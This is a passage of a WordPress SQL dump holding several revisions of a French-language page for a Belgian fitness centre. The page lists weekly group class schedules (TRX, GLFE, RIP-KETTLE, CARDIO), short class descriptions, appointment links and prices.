class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:40:45', '2013-10-05 08:40:45', '', 11, 'http://www.crosstrainingcenter.be/11-revision-118/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(350, 1, '2013-10-05 08:51:08', '2013-10-05 08:51:08', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:51:08', '2013-10-05 08:51:08', '', 11, 'http://www.crosstrainingcenter.be/11-revision-121/', 0, 'revision', '', 0),
(352, 1, '2013-10-05 08:53:02', '2013-10-05 08:53:02', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:53:02', '2013-10-05 08:53:02', '', 11, 'http://www.crosstrainingcenter.be/11-revision-123/', 0, 'revision', '', 0),
(353, 1, '2013-10-05 08:54:27', '2013-10-05 08:54:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:54:27', '2013-10-05 08:54:27', '', 11, 'http://www.crosstrainingcenter.be/11-revision-124/', 0, 'revision', '', 0),
(354, 1, '2013-10-05 08:55:15', '2013-10-05 08:55:15', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" 